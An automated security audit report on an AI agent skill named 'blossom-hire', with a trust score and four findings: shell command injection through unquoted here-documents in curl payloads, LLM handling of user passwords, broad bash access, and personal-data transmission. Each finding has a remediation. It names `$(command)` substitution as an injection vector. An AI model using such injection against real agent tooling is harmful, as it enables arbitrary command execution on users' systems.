Trust Assessment
blossom-hire received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Command Injection via Unsanitized Shell Variables in `curl` Payload, Direct Handling and Transmission of `passKey`, Broad `bash` and `jq` Tool Access.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Command Injection via Unsanitized Shell Variables in `curl` Payload The 'Commit role' and 'Retrieve candidates' bash examples use unquoted here-documents (`<<JSON`) for `curl` payloads, allowing shell variable expansion. Variables like `PERSON_ID`, `SESSION_KEY`, `ADDRESS_ID`, and `NOW_MILLIS` are directly interpolated into the JSON. If the values assigned to these variables (which originate from the LLM's state or user input) contain shell metacharacters (e.g., `$(command)`), they will be executed by the shell before the `curl` command runs, leading to arbitrary command execution. Use quoted here-documents (`<<'JSON'`) to prevent shell variable expansion within the JSON payload. Instead, the LLM should be instructed to directly substitute the values into the JSON string, ensuring proper JSON escaping. Alternatively, if shell variables must be used, ensure they are properly quoted within the JSON string (e.g., `"\"${SESSION_KEY}\""`) and that the LLM sanitizes inputs to prevent shell metacharacters. The best practice is to avoid shell variable expansion for data that should be part of the JSON payload. | LLM | SKILL.md:248 | |
| HIGH | Direct Handling and Transmission of `passKey` The skill explicitly instructs the LLM to collect a `passKey` (password) from the user and transmit it directly in the JSON body for both registration and login. This means the `passKey` will be exposed in the LLM's conversational context, potentially in logs, and transmitted in plain text over HTTPS (though HTTPS protects transit, the LLM's internal handling is the concern). There are no instructions for secure input methods (e.g., masked input) or temporary storage, increasing the risk of exposure. 1. **Avoid direct `passKey` handling by the LLM:** If possible, the API should use a more secure authentication flow (e.g., OAuth, token exchange) that doesn't require the LLM to directly handle user passwords. 2. **Masked Input:** If `passKey` is unavoidable, instruct the LLM to use masked input for the `passKey` if the platform supports it, and to immediately discard the `passKey` from its context after use. 3. **Ephemeral Storage:** Emphasize that the `passKey` should only be held ephemerally for the API call and never stored persistently or logged. | LLM | SKILL.md:100 | |
| MEDIUM | Broad `bash` and `jq` Tool Access The skill explicitly requires `bash` and `jq` tool access. `bash` provides a wide range of capabilities, including filesystem access, network operations, and arbitrary command execution. While necessary for the skill's functionality (making `curl` calls), the broad access without specified sandboxing or restrictions increases the potential impact of other vulnerabilities, such as command injection. 1. **Least Privilege:** If the platform allows, restrict `bash` execution to only the `curl` and `jq` commands needed, or provide a more constrained execution environment. 2. **Input Sanitization:** Implement robust input sanitization for all data passed to `bash` commands to mitigate command injection risks. 3. **Consider alternative execution:** If possible, use a more structured and less flexible method for making HTTP requests than raw `bash` and `curl` (e.g., a dedicated HTTP client library if the platform supports it). | LLM | SKILL.md:44 | |
| INFO | Handling of Personally Identifiable Information (PII) The skill is designed to collect and transmit a significant amount of Personally Identifiable Information (PII), including email, full name, mobile number, address details, and a `passKey`, to the `hello.blossomai.org` API. While this is the intended functionality, it highlights the sensitive nature of the data being processed. Any compromise of the `blossomai.org` endpoint or the skill's execution environment could lead to the exposure of this PII. 1. **Privacy Policy:** Ensure users are fully aware of what data is collected, why, and where it is sent, ideally linking to a privacy policy for `blossomai.org`. 2. **Data Minimization:** Only collect the absolute minimum data required for the task. 3. **Secure Storage/Transmission:** Reiterate the importance of secure transmission (HTTPS, which `curl` uses) and secure storage practices by the backend service. | LLM | SKILL.md:88 |
Scan History
Embed Code
[](https://skillshield.io/report/b2394ca447ca8d7a)
Powered by SkillShield